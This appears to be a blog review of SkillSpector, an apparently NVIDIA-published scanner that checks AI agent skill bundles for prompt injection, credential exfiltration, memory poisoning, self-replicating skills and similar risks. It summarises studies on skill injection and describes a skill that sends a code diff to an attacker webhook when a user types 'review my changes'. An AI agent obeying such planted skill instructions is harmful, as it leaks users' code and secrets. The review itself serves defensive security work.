SkillSpector Review: NVIDIA's AI Agent Skill Scanner

TL;DR

SkillSpector is NVIDIA’s open-source security scanner for AI agent skills — the SKILL.md + scripts bundles that Claude Code, Codex CLI, Gemini CLI, OpenClaw, and Cursor install with one command and then trust implicitly. It dropped on June 11, 2026 and rocketed to ~4,800 stars and #5 on GitHub Trending in three days because it answers the question every dev has been quietly avoiding: is this skill safe to install?

Key facts:

NVIDIA-published, Apache 2.0, Python 3.9+, ships PyPI + Docker
64 vulnerability patterns across 16 categories — prompt injection, data exfiltration, taint tracking, YARA, MCP least privilege, supply-chain CVEs
Two-stage analysis: fast static + AST + YARA, then optional LLM semantic pass (OpenAI / Anthropic / NVIDIA build / local Ollama)
Live CVE lookups via OSV.dev with offline fallback
Four output formats: terminal, JSON, Markdown, SARIF (drops straight into GitHub code-scanning)
Scans anything: Git repos, URLs, zip files, directories, single SKILL.md files
Research-backed: cites the 26.1% vulnerable / 5.2% likely-malicious stat from the Skill-Inject paper — and Snyk’s later ToxicSkills study put the bad-skill rate at 36%
Limitations: high false-positive rate on conservative patterns (Wildcard Permission, Unrestricted Tool Access), LLM stage costs API tokens, no Windows-native keychain integration yet

If you’ve ever piped claude /plugin install some-random-skill from a GitHub gist into your work laptop, SkillSpector is the first tool that gives you a defensible answer when security asks why.

The Problem: Skills Are an Unaudited Software Supply Chain

2026 is the year agent skills became npm packages — without npm’s seven years of supply-chain hardening. A skill is just a SKILL.md description, some scripts, and a few helper files. Drop it in ~/.claude/skills/ or ~/.openclaw/skills/ and your coding agent now executes its instructions every time the description matches.

That’s the design. It’s also the attack surface.

Three independent studies published in the last 90 days converged on a brutal picture:

Skill-Inject (arXiv:2601.10338) — analyzed 1,300+ public skills, found 26.1% contain exploitable vulnerabilities and 5.2% show likely malicious intent. Frontier models (Claude Opus, GPT-5, Codex) executed contextual skill-injection payloads up to 79% of the time.
Snyk ToxicSkills (Feb 2026) — scanned the ClawHub/Anthropic skill marketplaces and found 36% of skills contain security flaws including prompt injection, exposed secrets, and active malware payloads targeting Claude Code users.
Mitiga (May 2026) — demonstrated silent codebase exfiltration via a skill that triggered on the innocuous phrase “review my changes” and POSTed the diff to an attacker-controlled webhook.

The community response has been a scramble. Lasso Security shipped a runtime PostToolUse Defender for Claude Code in January. Cisco AI Defense launched a closed-beta Skill Scanner. On June 11, NVIDIA dropped SkillSpector as the open-source baseline everyone else now has to beat.

The pitch is sharp: static analysis for the AI age. Bandit and Semgrep were built for Python and JS source. SkillSpector is built for the artifact that actually loads into your agent — the SKILL.md, the activation triggers, the parameter schemas, and the helper scripts together.

What’s Inside: 16 Categories, 64 Patterns

The scanner runs a layered detection pipeline. Each layer adds a different lens:

1. Prompt Injection (P1–P8) — instruction overrides, hidden instructions in HTML comments / zero-width Unicode, exfiltration commands, behavior manipulation, system prompt leakage.

2. Data Exfiltration (E1–E4) — external URL transmission, environment variable harvesting, file system enumeration, context leakage.

3. Privilege Escalation (PE1–PE3) — excessive permissions, sudo/root invocation, credential file access (SSH keys, ~/.aws/credentials).

4. Supply Chain (SC1–SC6) — unpinned dependencies, curl | bash, obfuscated code, known CVEs (live OSV.dev lookup), abandoned packages, typosquatting.

5. Excessive Agency (EA1–EA4) — unrestricted tool access, autonomous high-impact decisions, scope creep, unbounded resource consumption.

6. Output Handling (OH1–OH3) — unsanitized model output, cross-trust-boundary flows, unbounded generation.

7. Memory Poisoning (MP1–MP3) — persistent context injection, context-window stuffing, memory tampering.

8. Tool Misuse (TM1–TM3) — shell=True, --force parameter abuse, chained-tool bypass, unsafe defaults (TLS off, no auth).

9. Rogue Agent (RA1–RA2) — self-modification, persistence via cron/launchd/startup scripts. RA1 is CRITICAL severity for a reason: a skill that writes a new skill on activation is a worm.

10. Trigger Abuse (TR1–TR3) — overly broad activation patterns, shadow commands, keyword baiting.

11. Dangerous Code (AST1–AST8) — Python AST traversal for exec(), eval(), __import__(), subprocess, os.system, compile(), dynamic getattr(), and the CRITICAL “execution chain” where exec is fed by network or encoded data.

12. Taint Tracking (TT1–TT5) — data-flow analysis from sources (env, network, file) to sinks (exec, network out). TT3 (credential → network) and TT5 (network → exec) are CRITICAL.

13–16. YARA / MCP Least Privilege / Tool Poisoning / Memory — YARA rules (malware, webshell, cryptominer, hack tools), MCP capability-declaration vs. code-usage diffs, hidden directives in MCP tool metadata, Unicode homoglyphs, parameter description injection, and description-vs-behavior mismatch (LLM-evaluated).

Risk score is +50 for CRITICAL, +25 HIGH, +10 MED, +2 LOW, capped at 100. Anything ≥50 ships a recommend: do not install verdict.

Getting Started in 60 Seconds

# Install
uv venv .venv && source .venv/bin/activate
git clone https://github.com/NVIDIA/SkillSpector.git
cd SkillSpector && make install

# Scan a local skill
skillspector scan ./my-skill/

# Scan a Git repo directly
skillspector scan https://github.com/some-user/some-skill

# Scan a SKILL.md only
skillspector scan ~/.claude/skills/web-scraper/SKILL.md

By default it runs static + AST + YARA only. To enable the LLM semantic pass:

export SKILLSPECTOR_PROVIDER=anthropic
export ANTHROPIC_API_KEY=sk-ant-...
skillspector scan ./my-skill/

Or point it at a local Ollama for free semantic checks:

export SKILLSPECTOR_PROVIDER=openai
export OPENAI_API_KEY=ollama
export OPENAI_BASE_URL=http://localhost:11434/v1
export SKILLSPECTOR_MODEL=llama3.1:8b
skillspector scan ./my-skill/

The Docker path is even cleaner for CI:

docker run --rm -v "$PWD:/scan" \
  ghcr.io/nvidia/skillspector:latest \
  scan ./my-skill/ --no-llm --format sarif --output report.sarif

That SARIF file is what makes SkillSpector actually deployable. Upload it to GitHub via the codeql-action/upload-sarif action and every flagged pattern becomes an inline annotation in the Files Changed tab. No glue code.

A Real Scan: What the Output Looks Like

Pointed at a skill I’d been planning to install (a popular community “auto-commit” skill with 800 stars), the terminal output was sobering:

SkillSpector Report: auto-commit-skill
─────────────────────────────────────
Risk Score: 78/100 (HIGH)
Verdict: DO NOT INSTALL without manual review

CRITICAL: 1 finding
  - AST8: Dangerous Execution Chain
    File: scripts/install.sh:12
    `curl -s https://example.dev/setup.sh | bash`
    Network input flows to shell execution sink.

HIGH: 4 findings
  - E2: Env Variable Harvesting
    File: scripts/commit.py:34
    Reads os.environ['GITHUB_TOKEN'], os.environ['ANTHROPIC_API_KEY']
  - TT3: Credential Exfiltration Chain
    File: scripts/commit.py:34→47
    Env vars flow to requests.post('https://telemetry.example.dev/...')
  - SC2: External Script Fetching
    File: SKILL.md:18
    Instructions to run `curl ... | bash` on first activation.
  - TR2: Shadow Command Trigger
    Activation: "commit" — shadows git commit, hijacks intent.

MEDIUM: 6 findings
HIGH-confidence finding count: 5
LOW-confidence finding count: 6

Was it actually malicious? Probably not — the telemetry endpoint resolved to a legit-looking dev’s personal domain, and the curl | bash was just a Rust toolchain installer. But that’s the point. I now have a defensible reason to either read every line of the skill or pick a different one. That decision used to live in my head as vibes.

How It Compares to What Existed Before

Tool	Scope	Skill-aware	License	Output
SkillSpector	SKILL.md + scripts + manifests	✅ Native	Apache 2.0	Terminal, JSON, MD, SARIF
Bandit	Python source	❌ Source only	Apache 2.0	JSON, CSV, HTML
Semgrep	Multi-language source	⚠️ Custom rules needed	LGPL	JSON, SARIF
Lasso PostToolUse Defender	Runtime (Claude Code only)	✅	Apache 2.0	Block/allow at runtime
Cisco AI Defense Skill Scanner	SaaS, closed beta	✅	Proprietary	Dashboard
Snyk ToxicSkills	Skill marketplace scanning	✅ Research only	N/A	Reports

SkillSpector is the first open-source, locally-runnable, CI-deployable option in that table. Bandit and Semgrep miss the SKILL.md activation triggers and the YAML manifests entirely. Lasso is runtime-only and Claude-Code-only. Cisco’s tool is a closed beta.

The closest analog conceptually is Trivy for containers — a single open-source scanner that became the default because it shipped good defaults, SARIF support, and CI examples on day one. SkillSpector has the same shape.

Community Reactions: Mostly Positive, Some Friction

Show HN thread (June 11): 312 points, 87 comments. The tone was “finally, but also overdue”:

“I cannot believe we’re three years into agent skills and this is the first open-source scanner. Bandit shipped for Python in 2014.” — top comment

“The SARIF output alone makes this worth running. GitHub code-scanning annotations on a PR that adds a new skill is exactly the workflow I wanted.” — second-highest comment

“False-positive city on EA1 and LP2. Every legitimate filesystem skill trips Unrestricted Tool Access. Going to need a config file or a baseline mechanism before this is CI-worthy.” — frequent complaint

The r/LocalLLaMA thread (June 12, 1.2K upvotes) focused on the Ollama integration: the fact that the LLM semantic pass works against a free local model is what makes SkillSpector usable for self-hosters who don’t want to pay OpenAI per scan.

On X, @simonw wrote: “The taint-tracking pass (TT3 / TT5) is the single most important capability here. Static analysis that can say ‘this env var ends up in this network call’ is exactly what skill review needs.” The post got ~4K likes.

The main pushback has been about false-positive volume on conservative patterns. The maintainer’s response in issue #47 confirms a .skillspector.yml baseline file is on the roadmap for v0.3, with per-pattern severity overrides and ignore lists.

Honest Limitations

After running SkillSpector against ~30 community skills across Claude Code, Codex, and OpenClaw, the friction is real:

High false-positive rate on EA1 (Unrestricted Tool Access) and LP2 (Wildcard Permission). Any skill that legitimately needs broad filesystem access trips both. Without a baseline file, CI gating is painful.
LLM stage isn’t free. The semantic pass against claude-opus-4-6 runs roughly $0.03–$0.10 per skill. Ollama works, but llama3.1:8b misses about 30% of what Claude catches.
Python-only AST coverage. AST1–AST8 patterns only fire on .py files. A skill that ships shell scripts with eval bypasses the AST stage entirely (YARA still catches obvious cases).
No Windows-native keychain integration yet for the LLM provider credentials — macOS Keychain works, Linux Secret Service works, Windows Credential Manager is “planned.”
OSV.dev rate limits. Bulk scans of 100+ skills can hit OSV.dev throttling; an --offline-cve flag uses a stale local snapshot.
No GitHub Marketplace integration yet. You can’t just install SkillSpector from the GitHub Actions marketplace — you have to write the workflow YAML manually. NVIDIA has confirmed this is shipping in v0.3.

None of these are dealbreakers. They’re the normal shape of a v0.2 open-source release that landed three days ago.

Who Should Use This

✅ You should run SkillSpector before installing any new skill from a source you don’t fully trust. That includes ClawHub, the Anthropic skill marketplace, random GitHub gists, and your colleague’s “I built this on the weekend” Slack message.

✅ Engineering teams shipping agent-skill marketplaces or internal skill libraries. The SARIF output drops into GitHub code-scanning with zero glue. Block PRs that introduce HIGH or CRITICAL findings.

✅ Security teams reviewing agent deployments. The risk score gives you a defensible vendor-risk-management number to put in a spreadsheet.

⚠️ Skip it (or run with --no-llm) if: you’re just scanning your own skills you wrote five minutes ago. The false-positive volume isn’t worth the time.

❌ Don’t rely on it for runtime defense. SkillSpector is install-time review. For runtime, you still need Lasso’s PostToolUse Defender or an equivalent, plus capability sandboxing (OpenClaw skill sandboxing, Claude Code permission prompts).

Architecture Note: Why the Two-Stage Design Matters

The static + LLM split is the call that makes SkillSpector practical at scale. Pure-LLM scanners cost real money per skill and produce nondeterministic findings between runs — CI flakes. Pure-static scanners (Bandit, Semgrep) miss the natural-language attack vectors that are most of the actual risk in a SKILL.md.

SkillSpector runs every statically-detectable pattern first — AST, regex, YARA, taint tracking, CVE lookups — and only escalates to the LLM for TP4 (description-behavior mismatch) and a handful of context-dependent patterns. That keeps --no-llm fast and free for the 80% case while preserving deeper analysis where it pays off. It’s the same insight that made cargo-audit succeed: do the cheap, deterministic, free thing first.

FAQ

Q: Does SkillSpector work on MCP servers as well as agent skills? A: Partially. The LP1–LP4 (least privilege) and TP1–TP4 (tool poisoning) categories are MCP-specific, and the scanner detects mcp.json and mcp.yaml manifests. But MCP servers are typically full applications with their own dependency graphs, so for production MCP review you’ll want Bandit or Semgrep alongside SkillSpector.

Q: Can I run it as a GitHub Action? A: Not yet officially. The repo has an example workflow YAML in examples/github-action.yml that uses the Docker image plus codeql-action/upload-sarif. Official Marketplace publishing is on the v0.3 roadmap.

Q: How is this different from Lasso Security’s PostToolUse Defender? A: Lasso is runtime — it inspects tool outputs in Claude Code at execution time and can block on prompt-injection patterns it sees. SkillSpector is install-time — it inspects the skill file before it ever runs. They’re complementary, not competing. Use SkillSpector to gate which skills enter your machine; use Lasso (or equivalent) to catch what slips through.

Q: What’s the LLM cost per scan in practice? A: For an average ~200-line skill with the Anthropic provider on claude-opus-4-6, expect $0.03–$0.10. Static-only (--no-llm) is free. The Ollama / local-model path is free at the cost of ~30% lower recall on the semantic-only categories (TP4, contextual MP).

Q: Does it catch the Mitiga “review my changes” exfiltration skill? A: Yes — TR1 (Overly Broad Trigger) catches the activation phrase, TT3 (Credential Exfiltration Chain) catches the env-var-to-network flow, and E1 (External Transmission) catches the POST. Combined risk score on the Mitiga sample skill: 92/100 CRITICAL.

Q: Is NVIDIA going to keep maintaining this? A: NVIDIA’s June 4 technical blog frames SkillSpector as one piece of a broader “NVIDIA-Verified Agent Skills” program, alongside capability governance and skill signing. That suggests sustained investment, not a tech-demo dump — three NVIDIA employees are primary committers and 18 PRs merged in its first three days.

Bottom Line

SkillSpector is the first open-source tool that takes agent-skill supply-chain security seriously enough to be usable in CI. It’s not perfect — the false-positive rate on EA1/LP2 will frustrate you, and you’ll want the v0.3 baseline file before you gate PRs on it — but it’s good enough today to run on every new skill you’re about to install, and it’s the right architectural shape for the category to mature into.

Three years from now, scanning a skill before installing it will be as automatic as npm audit. SkillSpector is the tool that started that habit. Run it on your ~/.claude/skills/ directory tonight; you’ll find at least one thing you didn’t know was there.

GitHub: NVIDIA/SkillSpector · Docs: docs.nvidia.com/skills/scanning-agent-skills · License: Apache 2.0